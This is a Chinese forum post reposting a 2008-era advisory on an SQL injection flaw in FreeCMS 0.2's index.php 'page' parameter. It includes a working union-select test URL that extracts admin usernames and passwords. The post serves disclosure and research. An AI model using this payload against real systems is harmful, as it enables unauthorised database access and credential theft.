找回密码
 开放注册

QQ登录

只需一步,快速开始

微信登录

微信扫码,快速开始

搜索
NB5牛论坛»首页 技术交流区 网安技术 FreeCMS 'index.php' SQL注入漏洞
返回列表 发新帖
查看: 869|回复: 0

FreeCMS 'index.php' SQL注入漏洞

[复制链接]
smxyy

38

主题

22

回帖

78

牛毛

初生牛犊

积分
78
发表于 2008-6-25 11:19:10 | 显示全部楼层 |阅读模式 来自 河南省郑州市
FreeCMS.us FreeCMS 0.2
描述:
BUGTRAQ ID: 29***73
CNCAN ID:CNCAN-200****1903

FreeCMS是一款基于PHP的WEB应用程序。
FreeCMS不正确处理用户提交的输入,远程攻击者可以利用漏洞进行SQL注入攻击,可能获得敏感信息或操作数据库。
问题是'index.php'脚本对用户提交给'page'参数缺少过滤,构建恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。
<* 参考:
漏洞提供者
Mr.SQL <SQL@Hotmail.it>
*>
测试方法:

[警 告]

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.风险自负!

http://www.example.com/index.php?page=-28+union+select+concat_ws(0x3a,admin,password)+from+admin/*
建议:
目前没有解决方案提供:
http://www.freecms.us/
SQL, 漏洞
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 开放注册

本版积分规则

帮助|Archiver|小黑屋|通信管理局专项备案号:[2008]238号|NB5用户社区 ( 皖ICP备08004151号;皖公网安备34010402700514号 )

GMT+8, 2025-1-12 09:52 , Processed in 0.112893 second(s), 23 queries , Yac On.

Powered by Discuz! X3.5

快速回复 返回顶部 返回列表